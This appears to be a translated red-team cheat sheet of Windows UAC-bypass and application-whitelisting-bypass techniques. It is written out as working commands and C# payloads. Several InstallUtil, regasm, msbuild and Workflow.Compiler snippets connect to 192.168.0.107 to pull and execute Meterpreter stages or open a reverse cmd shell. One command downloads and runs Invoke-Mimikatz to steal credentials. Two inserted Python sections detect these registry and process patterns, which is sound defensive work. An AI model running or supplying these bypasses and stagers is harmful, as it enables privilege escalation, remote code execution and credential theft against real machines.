>reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
>schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

Sdclt

win10
1.
>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f    gains administrator rights
>sdclt    pops a cmd
>reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f    clean up traces
2.
https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1
>Invoke-SDCLTBypass -Command "c:\windows\system32\cmd.exe /c C:\Windows\regedit.exe"
>sdclt.exe /KickOffElev

Makecab&Wusa

When copying the file fails

>makecab PsExec64.exe C:\Users\y.ZONE\Desktop\ps.cab
>wusa C:\Users\y.ZONE\Desktop\ps.cab /extract:C:\Windows\system32\


CLR BypassUAC

Tested on win10 x64
Generate a dll and upload it to the target's temp directory, then save the following as 1.bat and run it.
REG ADD "HKCU\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32" /ve /t REG_EXPAND_SZ /d "C:\Temp\test.dll" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER" /t REG_SZ /d "{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}" /f
REG ADD "HKCU\Environment" /v "COR_ENABLE_PROFILING" /t REG_SZ /d "1" /f
REG ADD "HKCU\Environment" /v "COR_PROFILER_PATH" /t REG_SZ /d "C:\Temp\test.dll" /f
When the target runs a high-privilege .NET program such as gpedit.msc or eventvwr, the hijack takes effect.
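Added example (not part of the post): a scan over `reg query HKCU /s` style output for the per-user registry changes made in the Sdclt, SilentCleanup and CLR sections above (the HKCU App Paths\control.exe entry, the HKCU\Environment windir value, the COR_ENABLE_PROFILING / COR_PROFILER / COR_PROFILER_PATH variables and a per-user InprocServer32 registration). All of these live under HKCU, which is what makes them writable without elevation and also what makes them cheap to audit. The registry dump is constructed; the rule names are my own.

```python
import re

# Constructed `reg query HKCU /s` style dump; nothing here came from a real host.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Environment
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    windir    REG_SZ    cmd /K reg delete hkcu\Environment /v windir /f && REM
    COR_ENABLE_PROFILING    REG_SZ    1
    COR_PROFILER    REG_SZ    {FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}
    COR_PROFILER_PATH    REG_SZ    C:\Temp\test.dll

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe
    (Default)    REG_SZ    C:\Windows\system32\cmd.exe

HKEY_CURRENT_USER\Software\Classes\CLSID\{FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF}\InprocServer32
    (Default)    REG_EXPAND_SZ    C:\Temp\test.dll

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    C:\Users\y\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
"""

ENV_KEY = "HKEY_CURRENT_USER\\ENVIRONMENT"
APP_PATHS_PREFIX = "HKEY_CURRENT_USER\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\"
CLSID_PREFIX = "HKEY_CURRENT_USER\\SOFTWARE\\CLASSES\\CLSID\\"


def parse_reg_query(text):
    """Parse `reg query /s` output into {key: {value_name_lower: (type, data)}}."""
    keys = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" "):          # key lines are not indented
            current = raw.strip()
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if len(parts) == 2:
            parts.append("")                 # value with empty data
        if len(parts) == 3:
            name, rtype, data = parts
            keys[current][name.lower()] = (rtype, data)
    return keys


def scan(keys):
    """Apply the per-user hijack rules; returns (key, value name, rule) tuples."""
    findings = []
    for key, values in keys.items():
        k = key.upper()
        if k == ENV_KEY:
            if "windir" in values:
                findings.append((key, "windir", "per-user windir override"))
            if values.get("cor_enable_profiling", ("", ""))[1] == "1" and "cor_profiler" in values:
                findings.append((key, "cor_profiler", "per-user CLR profiler enabled"))
        elif k.startswith(APP_PATHS_PREFIX):
            findings.append((key, "(default)", "per-user App Paths entry"))
        elif k.startswith(CLSID_PREFIX) and k.endswith("\\INPROCSERVER32"):
            findings.append((key, "(default)", "per-user COM InprocServer32"))
    return findings


def scan_text(text):
    """Convenience wrapper: raw `reg query` text in, findings out."""
    return scan(parse_reg_query(text))


if __name__ == "__main__":
    for key, value, rule in scan_text(SAMPLE_REG_QUERY):
        print(rule, "->", key, value)
```

Per-user COM registrations are legitimate for some software (per-user installs of Office add-ins, for example), so the InprocServer32 rule is a triage hint rather than a verdict; the windir and COR_PROFILER rules have essentially no benign use under HKCU\Environment on a workstation. Sysmon event 13 (RegistryEvent SetValue) on the same paths gives the same coverage in real time.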

After execution

eventvwr registry hijack

Open Process Monitor, start eventvwr, press Ctrl+T to open the process tree, select the process and jump to its events

Right-click and choose Include eventvwr.exe

Show only registry activity

Add a filter to show NOT FOUND entries

Find the corresponding registry location

Change the value as shown in the screenshot

Start an MSF listener and open eventvwr again

Web Delivery

>use exploit/multi/script/web_delivery
>set target 3
>set payload windows/x64/meterpreter/reverse_tcp
>exploit
>use auxiliary/server/regsvr32_command_delivery_server
>set cmd ipconfig
>use exploit/windows/misc/regsvr32_applocker_bypass_server

Invoke-PsUACme

method="sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc"
>Invoke-PsUACme -method oobe -Payload "c:\user\a\desktop\x.exe"
An absolute path must be given
>Invoke-PsUACme -method oobe -Payload "powershell -w hidden -e xxxxxx"
>Invoke-PsUACme -Payload "powershell -noexit IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
Generate a psh-reflection format script with MSFVENOM
>Invoke-PsUACme –Payload "powershell c:\1.ps1"

Whitelist

GreatSCT

>git clone https://github.com/GreatSCT/GreatSCT.git
>cd GreatSCT/setup&./setup.sh
>use Bypass
>list
>use regasm/meterpreter/rev_tcp.py
>msfconsole -r /usr/share/greatsct-output/handlers/payload.rc

JSRat

>JSRat.py -i 192.168.1.107 -p 4444

Odbcconf.exe

>odbcconf.exe /a {regsvr C:\shell.dll}    the file extension can be anything

Msiexec.exe

>msiexec /y c:\user\admin\desktop\1.dll
>msiexec /q /i http://192.168.0.107/dll.dll
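Added defender-side example (not part of the original post): a process-creation triage for the whitelist-bypass binaries used in this section (msiexec, odbcconf, InstallUtil, regasm, Microsoft.Workflow.Compiler, msbuild, cmstp), keyed on the command-line shapes the section shows. The events are constructed in the shape of a Sysmon event 1 / 4688 record with invented paths (192.0.2.0/24 is a documentation range); the rule names are my own.

```python
import re

# Constructed process-creation records in the shape of a Sysmon event 1 / 4688
# entry; paths and hosts are invented (192.0.2.0/24 is a documentation range).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /q /i http://192.0.2.10/dll.dll"},
    {"image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf.exe /a {regsvr C:\Users\y\shell.dll}"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "cmdline": r"regasm.exe /u dll.dll"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe",
     "cmdline": r"Microsoft.Workflow.Compiler.exe 1.xml 1.cs"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",
     "cmdline": r"msbuild.exe 1.xml"},
    {"image": r"C:\Windows\System32\cmstp.exe",
     "cmdline": r"cmstp /s run.inf"},
    {"image": r"C:\Windows\System32\msiexec.exe",                            # benign install
     "cmdline": r"msiexec /i C:\Users\y\Downloads\7z.msi /qn"},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe",  # benign build
     "cmdline": r"msbuild.exe C:\src\app\app.csproj /t:Build"},
]

LOLBIN_RULES = [
    # (rule name, image pattern, command-line pattern); all matched case-insensitively
    ("msiexec-remote-or-dll", r"\\msiexec\.exe$", r"/i\s+https?://|/y\s+\S+"),
    ("odbcconf-regsvr", r"\\odbcconf\.exe$", r"/a\s*\{\s*regsvr\s"),
    ("installutil-uninstall", r"\\installutil\.exe$", r"\s/u\s"),
    ("regasm-unregister", r"\\regasm\.exe$", r"\s/u\s"),
    ("workflow-compiler", r"\\microsoft\.workflow\.compiler\.exe$", r"."),
    ("msbuild-xml-project", r"\\msbuild\.exe$", r"\S+\.xml\b"),
    ("cmstp-inf-install", r"\\cmstp\.exe$", r"/s\s+\S+\.inf\b"),
]
COMPILED_RULES = [(name, re.compile(img, re.IGNORECASE), re.compile(cmd, re.IGNORECASE))
                  for name, img, cmd in LOLBIN_RULES]


def classify(event):
    """Return the names of every rule the event matches (image and command line)."""
    return [name for name, img_re, cmd_re in COMPILED_RULES
            if img_re.search(event["image"]) and cmd_re.search(event["cmdline"])]


def triage(events):
    """Keep only events that matched something, paired with their rule names."""
    hits = []
    for event in events:
        tags = classify(event)
        if tags:
            hits.append((event["cmdline"], tags))
    return hits


if __name__ == "__main__":
    for cmdline, tags in triage(SAMPLE_EVENTS):
        print(", ".join(tags), "<-", cmdline)
```

The rules are intentionally narrow: InstallUtil /U and regasm /u are what the section abuses, but both are also what a legitimate uninstaller runs, so in production the parent process and the location of the assembly (user-writable directory versus Program Files) are the fields that separate the two, and the Workflow.Compiler rule can be unconditional because that binary has no routine use on a workstation.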

InstallUtil.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:y.exe  /unsafe C:\Users\y\Desktop\1.cs
using System;
using System.Net;
using System.Linq;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
using System.Configuration.Install;
using System.Windows.Forms;
public class GQLBigHgUniLuVx {
	public static void Main()
	{
		while(true)
		{{ MessageBox.Show("doge"); Console.ReadLine();}}
	}
}
[System.ComponentModel.RunInstaller(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
	public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
	{
		jkmhGrfzsKQeCG.LCIUtRN();
	}
}
public class jkmhGrfzsKQeCG
{ [DllImport("kernel")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
static byte[] ErlgHH(string ZwznjBJY,int KsMEeo) {
IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
catch { return null;}
byte[] UmquAHRnhhpuE = new byte[4];
XXxIoIXNCle.Receive(UmquAHRnhhpuE,4,0);
int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE,0);
byte[] qaYyFq = new byte[kFVRSNnpj +5];
int SRCDELibA =0;
while(SRCDELibA < kFVRSNnpj)
{ SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA +5,(kFVRSNnpj - SRCDELibA)<4096 ? (kFVRSNnpj - SRCDELibA) : 4096,0);}
byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
Array.Copy(TvvzOgPLqwcFFv,0, qaYyFq,1,4); qaYyFq[0]=0xBF;
return qaYyFq;}
static void cmMtjerv(byte[] HEHUjJhkrNS) {
if(HEHUjJhkrNS !=null) {
UInt32 WcpKfU = VirtualAlloc(0,(UInt32)HEHUjJhkrNS.Length,0x1000,0x40);
Marshal.Copy(HEHUjJhkrNS,0,(IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
UInt32 wdjYKFDCCf =0;
IntPtr XVYcQxpp = IntPtr.Zero;
UhxtIFnlOQatrk = CreateThread(0,0, WcpKfU, XVYcQxpp,0, ref wdjYKFDCCf);
WaitForSingleObject(UhxtIFnlOQatrk,0xFFFFFFFF); }}
public static void LCIUtRN() {
byte[] IBtCWU =null; IBtCWU = ErlgHH("192.168.0.107",12138);
cmMtjerv(IBtCWU);
} }
After generating the exe, run
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\y.exe
MSF listens on port 12138

Compiler.exe

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.tcp


1.xml
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>1.tcp</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<evidence xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Security.Policy" i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<generateExecutable xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</generateExecutable>
<generateInMemory xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">true</generateInMemory>
<includeDebugInformation xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</includeDebugInformation>
<linkedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<mainClass i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<outputName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></outputName>
<tempFiles i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<treatWarningsAsErrors xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">false</treatWarningsAsErrors>
<warningLevel xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">-1</warningLevel>
<win32Resource i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"/>
<d2p1:checkTypes>false</d2p1:checkTypes>
<d2p1:compileWithNoCode>false</d2p1:compileWithNoCode>
<d2p1:compilerOptions i:nil="true" />
<d2p1:generateCCU>false</d2p1:generateCCU>
<d2p1:languageToUse>CSharp</d2p1:languageToUse>
<d2p1:libraryPaths xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" i:nil="true" />
<d2p1:localAssembly xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.Reflection" i:nil="true" />
<d2p1:mtInfo i:nil="true"/>
<d2p1:userCodeCCUs xmlns:d3p1="http://schemas.datacontract.org/2004/07/System.CodeDom" i:nil="true" />
</parameters>
</CompilerInput>
1.tcp
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities; 
public class Program : SequentialWorkflowActivity
{
static StreamWriter streamWriter; 
public Program()
{
using(TcpClient client = new TcpClient("192.168.0.107", 12138))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream); 
StringBuilder strInput = new StringBuilder(); 
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine(); 
while(true)
{
strInput.Append(rdr.ReadLine());
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
} 
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder(); 
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
} 
}
>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe 1.xml 1.cs


using System.Workflow.Activities;
using System.Net; 
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Threading;
class yrDaTlg : SequentialWorkflowActivity {
[DllImport("kernel32")] private static extern IntPtr VirtualAlloc(UInt32 rCfMkmxRSAakg,UInt32 qjRsrljIMB, UInt32 peXiTuE, UInt32 AkpADfOOAVBZ);
[DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr DStOGXQMMkP, uint CzzIpcuQppQSTBJ, uint JCFImGhkRqtwANx, out uint exgVpSg);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 eisuQbXKYbAvA, UInt32 WQATOZaFz, IntPtr AEGJQOn,IntPtr SYcfyeeSgPl, UInt32 ZSheqBwKtDf, ref UInt32 SZtdSB);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr KqJNFlHpsKOV, UInt32 EYBOArlCLAM);
public yrDaTlg() {
byte[] QWKpWKhcs =
{SHELLCODE
};
IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0x3000, 0x04);
Marshal.Copy(QWKpWKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length);
IntPtr oXmoNUYvivZlXj = IntPtr.Zero; UInt32 XVXTOi = 0; IntPtr pAeCTfwBS = IntPtr.Zero;
uint BnhanUiUJaetgy;
bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x1000, (uint)0x20, out BnhanUiUJaetgy);
oXmoNUYvivZlXj = CreateThread(0, 0, AmnGaO, pAeCTfwBS, 0, ref XVXTOi);
WaitForSingleObject(oXmoNUYvivZlXj, 0xFFFFFFFF);}
}

Csc

>msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -f csharp
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:C:\Users\y\Desktop\shell.exe /platform:x64 /unsafe C:\Users\y\Desktop\shell.cs
>C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices; 
public class Program
{
public static void Main()
{
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
Shellcode.Exec();
}
}
public class Shellcode
{
public static void Exec()
{
byte[] shellcode = new byte[510] {
 SHELLCODE
};
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern bool VirtualFree(IntPtr lpAddress,
UInt32 dwSize, UInt32 dwFreeType);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern bool CloseHandle(IntPtr handle);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
[DllImport("kernel32")]
private static extern IntPtr GetModuleHandle(
string moduleName
);
[DllImport("kernel32")]
private static extern UInt32 GetProcAddress(
IntPtr hModule,
string procName
);
[DllImport("kernel32")]
private static extern UInt32 LoadLibrary(
string lpFileName
);
[DllImport("kernel32")]
private static extern UInt32 GetLastError();
}

Regasm

>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:C:\Users\y\Desktop\dll.dll /unsafe C:\Users\y\Desktop\dll.cs
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /u dll.dll
namespace HYlDKsYF
 {
	 public class kxKhdVzWQXolmmF : ServicedComponent {
		 public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); }
		 [ComRegisterFunction]
		 public static void RegisterClass ( string pNNHrTZzW )
		 {
			 ZApOAKJKY.QYJOTklTwn();
			 }
			 [ComUnregisterFunction]
			 public static void UnRegisterClass ( string pNNHrTZzW )
			 {
				 ZApOAKJKY.QYJOTklTwn();
				 }
				 }
				 public class ZApOAKJKY  { [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);
				 [DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);
				 [DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);
				 [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF,UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);
				 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy,int iJGvqiEDGLhjr) {
					 IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy),iJGvqiEDGLhjr);
					 Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
					 try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }
					 catch { return null;}
					 byte[] Bjpvhc = new byte[4];
					 MXCEuiuRIWgOYze.Receive(Bjpvhc,4,0);
int IETFBI = BitConverter.ToInt32(Bjpvhc,0);
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI +5];
int JFPJLlk =0;
while(JFPJLlk < IETFBI)
{ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk +5,(IETFBI - JFPJLlk)<4096 ? (IETFBI - JFPJLlk) : 4096,0);}
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);
Array.Copy(nXRztzNVwPavq,0, ZKSAAFwxgSDnTW,1,4); ZKSAAFwxgSDnTW[0]=0xBF;
return ZKSAAFwxgSDnTW;}
static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) {
	if(KNCtlJWAmlqJ !=null) {
		UInt32 uuKxFZFwog = HeapCreate(0x00040000,(UInt32)KNCtlJWAmlqJ.Length,0);
	UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog,0x00000008,(UInt32)KNCtlJWAmlqJ.Length);
	RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ,(UInt32)KNCtlJWAmlqJ.Length);
	UInt32 ijifOEfllRl =0;
	IntPtr ihXuoEirmz = CreateThread(0,0, sDPjIMhJIOAlwn, IntPtr.Zero,0, ref ijifOEfllRl);
	WaitForSingleObject(ihXuoEirmz,0xFFFFFFFF);}}
	
	public static void QYJOTklTwn() {
		byte[] ZKSAAFwxgSDnTW =null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.0.107",12138);
		TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);
		} } }

Msbuild

https://gitee.com/RichChigga/msbuild-exec
Set up an MSF listener
>C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe 1.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="iJEKHyTEjyCU">
<xUokfh />
</Target>
<UsingTask
TaskName="xUokfh"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;
using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;
public class xUokfh : Task, ITask {
[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 ogephG,UInt32 fZZrvQ, UInt32 nDfrBaiPvDyeP, UInt32 LWITkrW);
[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 qEVoJxknom, UInt32 gZyJBJWYQsnXkWe, UInt32 jyIPELfKQYEVZM,IntPtr adztSLHGJiurGO, UInt32 vjSCprCJ, ref UInt32 KbPukprMQXUp);
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr wVCIQGmqjONiM, UInt32 DFgVrE);
static byte[] VYcZlUehuq(string IJBRrBqhigjGAx, int XBUCexXIrGIEpe) {
IPEndPoint DRHsPzS = new IPEndPoint(IPAddress.Parse(IJBRrBqhigjGAx),XBUCexXIrGIEpe);
Socket zCoDOd = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
try { zCoDOd.Connect(DRHsPzS); }
catch { return null;}
byte[] OCrGofbbWRVsFEl = new byte[4];
zCoDOd.Receive(OCrGofbbWRVsFEl, 4, 0);
int auQJTjyxYw = BitConverter.ToInt32(OCrGofbbWRVsFEl, 0);
byte[] MlhacMDOKUAfvMX = new byte[auQJTjyxYw + 5];
int GFtbdD = 0;
while (GFtbdD < auQJTjyxYw)
{ GFtbdD += zCoDOd.Receive(MlhacMDOKUAfvMX, GFtbdD + 5, (auQJTjyxYw -GFtbdD) < 4096 ? (auQJTjyxYw - GFtbdD) : 4096, 0);}
byte[] YqBRpsmDUT = BitConverter.GetBytes((int)zCoDOd.Handle);
Array.Copy(YqBRpsmDUT, 0, MlhacMDOKUAfvMX, 1, 4); MlhacMDOKUAfvMX[0]= 0xBF;
return MlhacMDOKUAfvMX;}
static void NkoqFHncrcX(byte[] qLAvbAtan) {
if (qLAvbAtan != null) {
UInt32 jrYMBRkOAnqTqx = VirtualAlloc(0, (UInt32)qLAvbAtan.Length, 0x1000, 0x40);
Marshal.Copy(qLAvbAtan, 0, (IntPtr)(jrYMBRkOAnqTqx),qLAvbAtan.Length);
IntPtr WCUZoviZi = IntPtr.Zero;
UInt32 JhtJOypMKo = 0;
IntPtr UxebOmhhPw = IntPtr.Zero;
WCUZoviZi = CreateThread(0, 0, jrYMBRkOAnqTqx, UxebOmhhPw, 0, ref JhtJOypMKo);
WaitForSingleObject(WCUZoviZi, 0xFFFFFFFF); }}
public override bool Execute()
{
byte[] uABVbNXmhr = null; uABVbNXmhr = VYcZlUehuq("192.168.0.107",12138);
NkoqFHncrcX(uABVbNXmhr);
return true; } }
]]>
</Code>
</Task>
</UsingTask>
</Project>

Winrm

Set up an MSF listener

>mkdir winrm
>copy c:\Windows\System32\cscript.exe winrm
Create a file named WsmPty.xsl and paste the payload into it:
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd");
 ]]> </ms:script>
</stylesheet>

Execute:
